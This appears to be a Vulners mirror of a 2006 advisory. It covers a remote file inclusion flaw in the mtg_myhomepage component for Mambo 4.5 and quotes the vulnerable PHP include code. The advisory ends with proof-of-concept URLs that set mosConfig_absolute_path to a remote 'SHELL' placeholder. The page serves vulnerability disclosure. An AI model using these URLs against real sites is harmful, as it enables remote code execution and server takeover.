Lucene search
K

mtg_myhomepage.txt

🗓️ 27 Aug 2006 00:00:00Reported by OutlawType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 26 Views

mtg_myhomepage Component Remote File Inclusio

Code
` ###########################################################################################  
# Aria-Security.net Advisory #  
# Discovered by: O.U.T.L.A.W #   
  
# < www.Aria-security.net > #  
# Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp #  
# #  
###########################################################################################  
#Software: mtg_myhomepage Component For Mambo 4.5  
#Vendor : http://www.kamgaing.com/  
#Attack method: Remote File Inclusion  
  
#Source:  
  
  
if (file_exists  
  
($mosConfig_absolute_path.'/administrator/components/com_lmtg_myhomepage/language/'.$mosConfig_lang.'.php'))  
include_once  
  
($mosConfig_absolute_path.'/administrator/components/com_lmtg_myhomepage/language/'.$mosConfig_lang.'.php');  
else  
include_once  
  
($mosConfig_absolute_path.'/administrator/components/com_lmtg_myhomepage/language/english.php');  
  
if ($mosConfig_mbf_content)  
$iso_client_lang = MambelFish::discoverLanguage( $database );  
else  
$iso_client_lang = _LMTG_PRIMARY_LANG;   
  
  
************************************************************************************  
  
  
#Proof of Concept:   
#install.lmtg_homepage.php?mosConfig_absolute_path= SHELL  
#mtg_homepage.php?mosConfig_absolute_path= SHELL  
#   
#----------------------------------------------------------   
#   
  
  
#   
#Contact : [email protected]   
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Aug 2006 00:00Current
7.4High risk
Vulners AI Score7.4
26